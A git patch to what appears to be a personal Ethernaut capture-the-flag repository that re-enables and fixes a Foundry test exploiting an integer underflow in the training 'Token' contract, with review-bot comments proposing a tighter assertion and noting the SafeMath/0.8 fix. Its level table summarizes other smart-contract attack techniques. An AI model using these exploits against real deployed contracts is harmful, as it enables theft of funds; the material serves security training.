From 24e138c4f28b5c297ae66c4e4e275d676948e526 Mon Sep 17 00:00:00 2001
From: leovct
Date: Tue, 24 Sep 2024 21:23:16 +0200
Subject: [PATCH] fix: Ethernaut lvl 5
---
 doc/EthernautCTF.md | 2 +-
 package.json | 2 +-
 test/EthernautCTF/TokenExploit.t.sol | 13 ++++++++++---
 3 files changed, 12 insertions(+), 5 deletions(-)
diff --git a/doc/EthernautCTF.md b/doc/EthernautCTF.md
index e787908..1422dbc 100644
--- a/doc/EthernautCTF.md
+++ b/doc/EthernautCTF.md
@@ -6,7 +6,7 @@
 | 02 | [Fallout](../src/EthernautCTF/Fallout.sol) | ✅ | [FalloutExploit](../test/EthernautCTF/FalloutExploit.t.sol) | Typo in the constructor name. |
 | 03 | [CoinFlip](../src/EthernautCTF/CoinFlip.sol) | ✅ | [CoinFlipExploit](../test/EthernautCTF/CoinFlipExploit.t.sol) | The contract relies on `block.number` to generate a random value. |
 | 04 | [Telephone](../src/EthernautCTF/Telephone.sol) | ✅ | [TelephoneExploit](../test/EthernautCTF/TelephoneExploit.t.sol) | Use a helper contract to make sure `tx.origin` and `msg.sender` are different. |
-| 05 | [Token](../src/EthernautCTF/Token.sol) | ❌ | [TokenExploit](../test/EthernautCTF/TokenExploit.t.sol) | Exploit overflows and underflows of the `0.6.0` solidity compiler. |
+| 05 | [Token](../src/EthernautCTF/Token.sol) | ✅ | [TokenExploit](../test/EthernautCTF/TokenExploit.t.sol) | Exploit overflows and underflows of the `0.6.0` solidity compiler. |
 | 06 | [Delegation](../src/EthernautCTF/Delegation.sol) | ❌ | [DelegationExploit](../test/EthernautCTF/DelegationExploit.t.sol) | Make use of the `delegatecall` to overwrite the storage of the main contract. |
 | 07 | [Force](../src/EthernautCTF/Force.sol) | ✅ | [ForceExploit](../test/EthernautCTF/ForceExploit.t.sol) | Create a contract, fund it with some ether and use the `selfdestruct` method to send the contract balance to any other contract (e.g. a contract without any implementation). |
 | 08 | [Vault](../src/EthernautCTF/Vault.sol) | ✅ | [VaultExploit](../test/EthernautCTF/VaultExploit.t.sol) | Read the password from the contract storage. |
diff --git a/package.json b/package.json
index ca74577..4311e9b 100644
--- a/package.json
+++ b/package.json
@@ -6,7 +6,7 @@
 "check": "pnpm exec prettier --plugin prettier-plugin-solidity --check .",
 "lint": "pnpm exec prettier --plugin prettier-plugin-solidity --write .",
 "build": "forge build --sizes --skip Token",
- "exploits": "forge test -vvv --summary --no-match-contract 'CollatzPuzzle|Delegation' --no-match-path test/EthernautCTF/TokenExploit.t.sol"
+ "exploits": "forge test -vvv --summary --no-match-contract 'CollatzPuzzle|Delegation'"
 },
 "keywords": [],
 "author": "@leovct",
diff --git a/test/EthernautCTF/TokenExploit.t.sol b/test/EthernautCTF/TokenExploit.t.sol
index b08e3e3..13d58be 100644
--- a/test/EthernautCTF/TokenExploit.t.sol
+++ b/test/EthernautCTF/TokenExploit.t.sol
@@ -1,6 +1,13 @@
 // SPDX-License-Identifier: GPL-3.0
 pragma solidity ^0.6.0;
+// Fix the following compiler error (specific to 0.6.x)
+// Error: Unimplemented feature (/Users/distiller/project/libsolidity/codegen/CompilerUtils.cpp:420):Encoding type "struct StdInvariant.FuzzInterface memory[] memory" not yet implemented.
+// UnimplementedFeatureError: Encoding type "struct StdInvariant.FuzzInterface memory[] memory" not yet implemented.
+// - https://github.com/leovct/puzzl3s/issues/25
+// - https://github.com/foundry-rs/foundry/issues/4376
+pragma experimental ABIEncoderV2;
+
 import '../../src/EthernautCTF/Token.sol';
 import '@forge-std/Test.sol';
 import '@forge-std/console2.sol';
@@ -21,15 +28,15 @@ contract TokenExploit is Test {
 }
 function testExploit() public {
- uint256 balance = target.balanceOf(deployer);
+ uint256 balance = target.balanceOf(exploiter);
 console2.log('Balance: %d', balance);
- assertEq(balance, 0);
+ assertEq(balance, 20);
 vm.startPrank(exploiter);
 assertTrue(target.transfer(address(0x0), 21));
 vm.stopPrank();
- balance = target.balanceOf(deployer);
+ balance = target.balanceOf(exploiter);
 console2.log('Balance: %d', balance);
 assertTrue(balance >= 10000);
 }
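Review bot: The `build` script on the context line just above the changed one still passes `--skip Token`, while this hunk puts `test/EthernautCTF/TokenExploit.t.sol` back into the `exploits` run. If that skip was only there because of the 0.6.x encoder error this commit works around (an assumption; the reason is not visible in the diff), it is now stale and keeps `forge build` from ever compiling the Token files. Consider `"build": "forge build --sizes"`, or keep the skip and record the reason in the project docs, since JSON cannot carry a comment.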
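Review bot: The closing check `assertTrue(balance >= 10000)` in `testExploit` does not pin the wrap-around this level demonstrates; any large balance would pass it. With 20 tokens held and 21 sent, an unchecked 0.6.x subtraction should leave exactly the maximum value (assuming `Token.transfer` subtracts without SafeMath; `Token.sol` is not part of this diff), so `assertEq(balance, uint256(-1));` states the expected result precisely. A short comment before the transfer, such as `// 21 > balance (20): uint256 subtraction wraps silently before 0.8; SafeMath or a >=0.8 compiler reverts instead`, would record both the root cause and the contract-side fix for readers. The `TokenExploit` contract starts above this hunk, so its setup is not visible here.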